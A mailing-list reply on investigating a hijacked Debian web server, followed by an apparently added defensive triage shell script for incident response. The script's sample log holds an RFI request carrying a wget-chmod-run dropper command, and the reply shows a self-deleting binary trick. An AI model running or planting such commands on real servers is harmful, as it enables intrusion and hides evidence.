Re: found clues about a security issue in a web server



On Sunday 15 March 2009 11:40:22 kazabe wrote:
> Hi.
>
> In the last week my internet connection was frozen. After discarding
> ISP and routing problems, I saw this process on my web server (located
> behind my router):
>
> www-data 20580 00 00 815 355 ? S 07:16 6:01 ./s 86.23.114.12 80
>
> That process was using all the bandwidth (the address displayed is a
> remote IP, with no relationship to us). After killing that
> process, the internet service is normal again. The router and the
> web server are running Debian Lenny. The web server is not
> remotely accessible; all the administration is done physically at the PC.
> The web server doesn't have any remote access (no FTP, SSH, or
> telnet. Nothing).
>
> I tried to find that "./s" but I can't find it yet. How can I detect
> how that script was injected?

Hi, that sounds like exploitation of badly written script code (PHP, JSP, Perl, etc.).

Why?

Running ./s as www-data looks like a reverse connection started as the Apache
user, which is what tends to happen in script exploitation attacks.

Even more so since you say the only Internet-open port is the web server's.
------------------------------------------------------


> The web server is only there to publish a website related to a company
> internal process (but it is published to the Internet, by port forwarding
> from the router). That website uses PHP and MySQL.
>
> What can I check to solve that security issue?
>
> Thanks in advance.


That security issue happens because of badly programmed script code. First of all,
which scripting languages are installed on your server (PHP, JSP, Mono ASP.NET, Perl,
cgi-bin, etc.)?

If it's a CMS, is it properly updated?

Each language is a bit different from the others... E.g. on PHP, "safe_mode
on" is mandatory for security, and "url_fopen off" is mandatory to prevent
RFI...

Don't use or activate anything that you don't really use... if you don't use
cgi-bin, DISABLE IT.

-------------------------------------------------
Location of s.

Check in /tmp.
Check in www-data-writable dirs.

But remember, s could be deleted when you kill it; a simple bash sentence
demonstrates that:

(./s 86.23.114.12 80; rm -rf ./s)

Then when you kill s, the rm -rf acts... and bye bye to s.

---------------------------------------------------
Scope:

That ps line proves that an attacker has REMOTE control of a user shell on
your server, which is bad enough; you could have trojans/rootkits. (Don't
even think about your firewalls; they don't protect you against reverse connections.)

A worse scenario involves root compromise and compromise of other systems
over the network using MITM, etc.

---------------------------------------------------
Suggestions:

- Take your portal down
- Check your Apache logs (/var/log/www or similar).
- Check for rootkits
- Check for
- Create a hard-drive image (http://dcfldd.sourceforge.net/)
- Reinstall (please check whether your Linux distro is currently maintained; it's
  so important...)
- Do a server security hardening
- Check for updates and enable auto-updates
- Audit your code (PHP or whatever), update everything hand-updateable like a
  CMS, etc.
- Audit your filesystem permissions (chown and chmod are your best friends)
- Bring your portal back up
- Reboot your server weekly (uptime is the best enemy of security)



;-)
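Pulling the reply's advice together as a triage script (an added example, not code from the thread or from the original poster): it finds running processes whose binary has already been unlinked and saves them before they are killed (the answer to the rm -rf trick), lists www-data-writable directories, scans an Apache access log for remote-file-inclusion and dropper patterns, and reads the RFI-related php.ini directives. The www-data user name, the /var/log/apache2 and /etc/php5/apache2/php.ini paths, the sample log and php.ini fragment (documentation-range IPs plus the 86.23.114.12 address from the post) and the grep patterns are all assumptions or constructed data, not anything from the compromised server.

```shell
#!/bin/sh
# Triage helpers for the "./s <ip> 80" case above.  Added example, not code
# from the thread.  Assumptions: the web server runs as www-data and Apache
# logs live under /var/log/apache2 (Debian defaults); adjust both if needed.

# 1. Processes whose binary is already gone from disk.  The
#    "(./s ...; rm -rf ./s)" trick unlinks the file, but while the process
#    lives /proc/PID/exe still resolves to the inode, with " (deleted)"
#    appended to the link target.  Linux /proc only.
find_deleted_running() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            *' (deleted)') echo "${p#/proc/} $exe" ;;
        esac
    done
}

# 2. Copy the binary, command line, cwd and open descriptors (sockets
#    included) BEFORE killing the process; once it exits the inode is lost.
preserve_process() {
    pid=$1; dest=$2
    mkdir -p "$dest"
    cp "/proc/$pid/exe" "$dest/exe.bin"
    tr '\0' ' ' <"/proc/$pid/cmdline" >"$dest/cmdline"
    readlink "/proc/$pid/cwd" >"$dest/cwd"
    ls -l "/proc/$pid/fd" >"$dest/fds"
}

# 3. Directories www-data (or anybody) can write to: where a dropped file
#    can sit.  /tmp and world-writable upload dirs show up here.
find_www_writable() {
    find "${1:-/}" -xdev -type d \
        \( -user www-data -o -group www-data -o -perm -o+w \) 2>/dev/null
}

# 4. Access-log lines that look like the injection vector: a remote URL in a
#    query string (PHP remote file inclusion) or wget/curl/chmod and /tmp
#    smuggled through a parameter.  Heuristic, tune to your application.
scan_apache_log() {
    grep -E -i \
        '=(https?|ftp)://|(%20|;|%3b|\+)(wget|curl|chmod)(%20|\+| )|(/|%2f)tmp' "$1"
}
count_suspicious()   { scan_apache_log "$1" | wc -l | tr -d ' '; }
suspicious_clients() { scan_apache_log "$1" | awk '{ print $1 }' | sort -u; }

# 5. The php.ini switches behind RFI.  "url_fopen off" in the reply means
#    allow_url_fopen; since PHP 5.2 include/require of URLs is governed
#    separately by allow_url_include, so report both.
check_php_ini() {
    for d in allow_url_fopen allow_url_include; do
        v=$(grep -E -i "^[[:space:]]*$d[[:space:]]*=" "$1" | tail -n 1 \
            | sed -e 's/;.*//' -e 's/.*=//' -e 's/[[:space:]]//g')
        echo "$d=${v:-unset}"
    done
}

# Constructed sample data (not real traffic or a real config): one client
# pulls in a remote include, then drops and starts the connect-back binary
# through the same hole; two normal requests follow.
SAMPLE_LOG=$(mktemp)
cat >"$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [15/Mar/2009:07:15:58 +0100] "GET /index.php?page=http://203.0.113.5/c.txt? HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
192.0.2.10 - - [15/Mar/2009:07:16:02 +0100] "GET /index.php?page=http://203.0.113.5/c.txt?&cmd=cd%20/tmp;wget%20http://203.0.113.5/s;chmod%20%2Bx%20s;./s%2086.23.114.12%2080 HTTP/1.1" 200 311 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Mar/2009:08:01:10 +0100] "GET /index.php?page=about HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
198.51.100.9 - - [15/Mar/2009:08:02:33 +0100] "POST /login.php HTTP/1.1" 302 0 "http://www.example.com/" "Mozilla/5.0"
EOF
SAMPLE_INI=$(mktemp)
cat >"$SAMPLE_INI" <<'EOF'
; constructed php.ini fragment with the weak setting
allow_url_fopen = On   ; lets include()/fopen() fetch remote URLs
allow_url_include = Off
EOF

# Live run on the box:  sh triage.sh run [/path/to/access.log] [/path/to/php.ini]
if [ "${1:-}" = "run" ]; then
    log=${2:-/var/log/apache2/access.log}
    ini=${3:-/etc/php5/apache2/php.ini}
    echo "== processes whose binary was unlinked =="; find_deleted_running
    echo "== www-data writable directories ==";      find_www_writable /
    echo "== suspicious requests in $log ==";        scan_apache_log "$log"
    echo "== offending client IPs ==";               suspicious_clients "$log"
    echo "== RFI-related php.ini settings ==";       check_php_ini "$ini"
fi
```

On the constructed log the scan returns the two requests from 192.0.2.10 and nothing else, and the php.ini check reports allow_url_fopen=On beside allow_url_include=Off. A hit is a starting point, not a verdict: read the full request, line its timestamp up against the start time of the `./s` process in the ps output (07:16 in the post) and run preserve_process on the PID before anything is killed, because the disk copy may already be gone.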

